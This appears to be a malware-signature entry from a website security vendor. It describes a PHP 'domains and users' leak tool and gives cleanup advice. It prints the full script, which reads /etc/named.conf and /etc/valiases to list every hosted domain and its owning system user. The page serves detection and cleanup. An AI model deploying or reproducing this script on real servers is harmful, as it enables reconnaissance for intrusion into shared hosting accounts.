Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.exploit.leak.001.002

php.exploit.leak.001.002

PHP exploits are server-side malicious scripts which are commonly used as exploit. Exploit is piece of code that takes advantage of a bug, glitch or vulnerability, usually to gain control of a system it aims on. Typical targets are admin sections of various Content Management Systems or Website Administration Systems such as cPanel and others.
This tool gathers sensitive information from the server. In this case, domains and users.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for suspicious eval() code inside your site's files. Also, you can sign up with us and let our team remove the malware for you.

Dump


<?
echo "<title>UAHCrew # Domains & Users</title>
<style>
body,table{background: black; font-family:Verdana,tahoma; color: white; font-size:10px; }
A:link {text-decoration: none;color: red;}
A:active {text-decoration: none;color: red;}
A:visited {text-decoration: none;color: red;}
A:hover {text-decoration: underline; color: red;}
#new,input,table,td,tr,#gg{text-align:center;border-style:solid;text-decoration:bold;}
tr:hover,td:hover{text-align:center;background-color: #FFFFCC; color:green;}
</style>
<p align=center># Domains & Users</p>
<p align=center>by LoocK3D - locked.ks@gmail.com </p>
<center>";

$d0mains = @file("/etc/named.conf");

if(!$d0mains){ die("<b># can't ReaD -> [ /etc/named.conf ]"); }

echo "<table align=center border=1>
<tr bgcolor=green><td>Domains</td><td>Users</td></tr>";

foreach($d0mains as $d0main){

if(eregi("zone",$d0main)){

preg_match_all('#zone "(.*)"#', $d0main, $domains);
flush();

if(strlen(trim($domains[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));

echo "<tr><td><a href=http://www.".$domains[1][0]."/>".$domains[1][0]."</a></td><td>".$user['name']."</td></tr>"; flush();

}}}

echo "</table>
<p align='center'> UAHCrew ~
Hackeri-AL - LoocK3D - b4cKd00r ~
</p>
";

?>